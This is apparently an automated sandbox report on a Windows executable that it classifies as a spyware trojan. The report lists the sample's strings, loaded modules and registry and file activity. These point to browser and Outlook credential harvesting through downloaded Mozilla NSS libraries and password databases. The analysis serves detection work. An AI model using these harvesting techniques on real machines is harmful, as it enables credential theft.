Source: i3NmF0obCm.exe, 00000000.00000003.1831571860.0000000027A70000.00000004.00000020.00020000.00000000.sdmp, GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: i3NmF0obCm.exe, 00000000.00000003.1831571860.0000000027A70000.00000004.00000020.00020000.00000000.sdmp, GDHCGDGIEBKJKFHJJKFCBFBGDA.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: i3NmF0obCm.exe, 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

System Summary

PE file has a writeable .text section

Source: i3NmF0obCm.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4FED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	0_2_6C4FED10
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C53B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C53B700
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C53B8C0 rand_s,NtQueryVirtualMemory,	0_2_6C53B8C0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C53B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C53B910
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4DF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C4DF280

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4D35A0	0_2_6C4D35A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C54545C	0_2_6C54545C
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4E5440	0_2_6C4E5440
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C515C10	0_2_6C515C10
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C522C10	0_2_6C522C10
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C54AC00	0_2_6C54AC00
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C54542B	0_2_6C54542B
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4E64C0	0_2_6C4E64C0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4FD4D0	0_2_6C4FD4D0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C516CF0	0_2_6C516CF0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4DD4E0	0_2_6C4DD4E0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4E6C80	0_2_6C4E6C80
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5334A0	0_2_6C5334A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C53C4A0	0_2_6C53C4A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C500512	0_2_6C500512
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4EFD00	0_2_6C4EFD00
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4FED10	0_2_6C4FED10
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C510DD0	0_2_6C510DD0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5385F0	0_2_6C5385F0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C513E50	0_2_6C513E50
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4F4640	0_2_6C4F4640
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C522E4E	0_2_6C522E4E
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4F9E50	0_2_6C4F9E50
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C546E63	0_2_6C546E63
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4DC670	0_2_6C4DC670
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C517E10	0_2_6C517E10
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C525600	0_2_6C525600
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C539E30	0_2_6C539E30
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5476E3	0_2_6C5476E3
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4DBEF0	0_2_6C4DBEF0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4EFEF0	0_2_6C4EFEF0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C53E680	0_2_6C53E680
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4F5E90	0_2_6C4F5E90
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C534EA0	0_2_6C534EA0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C517710	0_2_6C517710
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4E9F00	0_2_6C4E9F00
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C506FF0	0_2_6C506FF0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4DDFE0	0_2_6C4DDFE0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5277A0	0_2_6C5277A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4F8850	0_2_6C4F8850
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4FD850	0_2_6C4FD850
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C51F070	0_2_6C51F070
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4E7810	0_2_6C4E7810
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C51B820	0_2_6C51B820
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C524820	0_2_6C524820
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5450C7	0_2_6C5450C7
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4FC0E0	0_2_6C4FC0E0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5158E0	0_2_6C5158E0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5060A0	0_2_6C5060A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4FA940	0_2_6C4FA940
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C52B970	0_2_6C52B970
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C54B170	0_2_6C54B170
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4ED960	0_2_6C4ED960
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C515190	0_2_6C515190
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C532990	0_2_6C532990
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C50D9B0	0_2_6C50D9B0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4DC9A0	0_2_6C4DC9A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C519A60	0_2_6C519A60
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C518AC0	0_2_6C518AC0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C51E2F0	0_2_6C51E2F0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4F1AF0	0_2_6C4F1AF0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C54BA90	0_2_6C54BA90
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C542AB0	0_2_6C542AB0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4D22A0	0_2_6C4D22A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C504AA0	0_2_6C504AA0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4ECAB0	0_2_6C4ECAB0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4D5340	0_2_6C4D5340
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4EC370	0_2_6C4EC370
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C51D320	0_2_6C51D320
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5453C8	0_2_6C5453C8
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C4DF380	0_2_6C4DF380
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C58AC60	0_2_6C58AC60
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C65AC30	0_2_6C65AC30
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C646C00	0_2_6C646C00
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5DECD0	0_2_6C5DECD0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C57ECC0	0_2_6C57ECC0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C64ED70	0_2_6C64ED70
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6AAD50	0_2_6C6AAD50
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C708D20	0_2_6C708D20
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C70CDC0	0_2_6C70CDC0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C584DB0	0_2_6C584DB0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C616D90	0_2_6C616D90
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C61EE70	0_2_6C61EE70
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C660E20	0_2_6C660E20
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C58AEC0	0_2_6C58AEC0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C620EC0	0_2_6C620EC0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C606E90	0_2_6C606E90
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C642F70	0_2_6C642F70
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5EEF40	0_2_6C5EEF40
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C586F10	0_2_6C586F10
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6C0F20	0_2_6C6C0F20
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C65EFF0	0_2_6C65EFF0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C580FE0	0_2_6C580FE0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6C8FB0	0_2_6C6C8FB0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C58EFB0	0_2_6C58EFB0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C654840	0_2_6C654840
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C60A820	0_2_6C60A820
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5D0820	0_2_6C5D0820
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6868E0	0_2_6C6868E0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5B8960	0_2_6C5B8960
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5D6900	0_2_6C5D6900
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C69C9E0	0_2_6C69C9E0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5B49F0	0_2_6C5B49F0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6109A0	0_2_6C6109A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C63A9A0	0_2_6C63A9A0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6409B0	0_2_6C6409B0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5FCA70	0_2_6C5FCA70
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C638A30	0_2_6C638A30
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C62EA00	0_2_6C62EA00
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5FEA80	0_2_6C5FEA80
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C686BE0	0_2_6C686BE0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C620BA0	0_2_6C620BA0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C598460	0_2_6C598460
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C60A430	0_2_6C60A430
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5E4420	0_2_6C5E4420
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5C64D0	0_2_6C5C64D0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C61A4D0	0_2_6C61A4D0

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: String function: 6C5A3620 appears 31 times
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: String function: 6C70DAE0 appears 31 times
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: String function: 6C5194D0 appears 90 times
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: String function: 6C50CBE8 appears 134 times
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: String function: 00EE43D0 appears 315 times
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: String function: 6C7009D0 appears 121 times

Source: i3NmF0obCm.exe, 00000000.00000002.1883978275.000000006C562000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs i3NmF0obCm.exe
Source: i3NmF0obCm.exe, 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs i3NmF0obCm.exe

Source: i3NmF0obCm.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/22@0/1

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_6C537030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C537030

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EF6550 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,

0_2_00EF6550

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll

Jump to behavior

Source: i3NmF0obCm.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: i3NmF0obCm.exe, i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: i3NmF0obCm.exe, 00000000.00000003.1729483221.0000000021854000.00000004.00000020.00020000.00000000.sdmp, JJKJDAEBFCBKECBGDBFC.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: i3NmF0obCm.exe, 00000000.00000002.1871636146.000000001B8DC000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1883636299.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: i3NmF0obCm.exe	Virustotal: Detection: 58%
Source: i3NmF0obCm.exe	ReversingLabs: Detection: 71%

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Section loaded: windowscodecs.dll	Jump to behavior

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: i3NmF0obCm.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: i3NmF0obCm.exe, 00000000.00000002.1883896730.000000006C54D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: i3NmF0obCm.exe, 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: i3NmF0obCm.exe, 00000000.00000002.1883896730.000000006C54D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EF76E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00EF76E0

Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
